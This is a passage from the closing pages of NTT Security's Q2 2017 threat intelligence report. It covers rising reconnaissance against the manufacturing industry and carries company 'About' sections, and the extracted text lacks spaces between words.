Thismaynotbodewellforthemanufacturingindustry,asalargepartofoverallreconnaissanceactivitywasaimedatthemanufacturingindustryduringQ2’17,and33percentofoverallactivityagainstthemanufacturingindustrywasreconnaissance-based.Iftrendsfromthepastfewyearscontinue,thisprobablyindicatesthatattacksandmalwarearelikelytoincreaseinmanufacturingorganizationsinthesecondhalfof2017.

Evenwithouttheloomingthreatofincreasedattackvolumes,themanufacturingindustryfacesavarietyofsecuritychallengesinitsongoingevolution.Withmoretechnologyandconnectivitycontinuallybeingintroducedintotheindustry,manufacturingisquicklybecomingahigh-valuetargetforcybercriminals.Whilenottypicallythoughtofashighly'attackable,'manufacturinghasbeenoneofthemostconsistentlyattackedindustriesoverthepastseveralyears,andwasthemosttargetedindustryinQ2‘17.Inadditiontopotentialthreatsuniquetothemanufacturers,theindustryalsofacesavarietyofthreats,prevalentacrossmanyindustries,includinginsiderandtechnicalthreats.

Thetacticsofcybercriminalswillcontinuetoevolve,asdoesthetechnologyavailabletothem.Thatbeingsaid,manythreatactorscontinuetousetriedandtruemethods(e.g.,unpatchedvulnerabilities),withmanyorganizationsfailingtoproperlysecuretheseattackvectors–alessonmanyorganizationslearnthehardway.

About GTICTheNTTSecurityGTICprotectsandinformsNTTSecurityclientsthroughsecuritythreatresearch,vulnerabilityanalysisandthedevelopmentofeffectivecountermeasures.Formoreinformation,includingvulnerabilitydisclosures18andthreatreports19,visittheresearchpageonwww.nttsecurity.com,ourblog20ordownloadrelatedwhitepapers21 .

About NTT-CERT NTT-CERT,adivisionofNTTSecurePlatformLaboratories,servesasatrustedpointofcontactforComputerSecurityIncidentResponseTeam(CSIRT)specialists,andprovidesfull-rangeCSIRTserviceswithinNTT.NTT-CERTgeneratesoriginalintelligenceregardingcybersecuritythreats,helpingtoenhanceNTTcompanies'capabilitiesinthesecurityservicesandsecurenetworkservicesfields.TolearnmoreaboutNTT-CERT,pleasevisitwww.ntt-cert.org22 .

About NTT SecurityNTTSecurityisthespecializedsecuritycompanyofNTTGroup.Withembeddedsecurity,weenableGroupcompanies(DimensionData,NTTCommunicationsandNTTDATA)todeliverresilientbusinesssolutionsforclients’digitaltransformationneeds.NTTSecurityhas10SOCs,sevenR&Dcenters,over1,500securityexpertsandhandleshundredsofthousandsofsecurityincidentsannuallyacrosssixcontinents.

NTTSecurityensuresthatresourcesareusedeffectivelybydeliveringtherightmixofconsultingandmanagedservicesforNTTGroupcompanies–makingbestuseoflocalresourcesandleveragingourglobalcapabilities.NTTSecurityispartoftheNTTGroup(NipponTelegraphandTelephoneCorporation),oneofthelargestICTcompaniesintheworld.Visitnttsecurity.comtolearnmore.

18 https://www.solutionary.com/threat-intelligence/vulnerability-disclosures/19 https://www.solutionary.com/threat-intelligence/threat-reports/20 http://www.solutionary.com/resource-center/blog/21 http://www.solutionary.com/resource-center/white-papers/22 http://www.ntt-cert.org

Global Threat Intelligence Center (GTIC) 2017 … Security Q2 2017... · Global Threat Intelligence...

Documents

Transcript of Global Threat Intelligence Center (GTIC) 2017 … Security Q2 2017... · Global Threat Intelligence...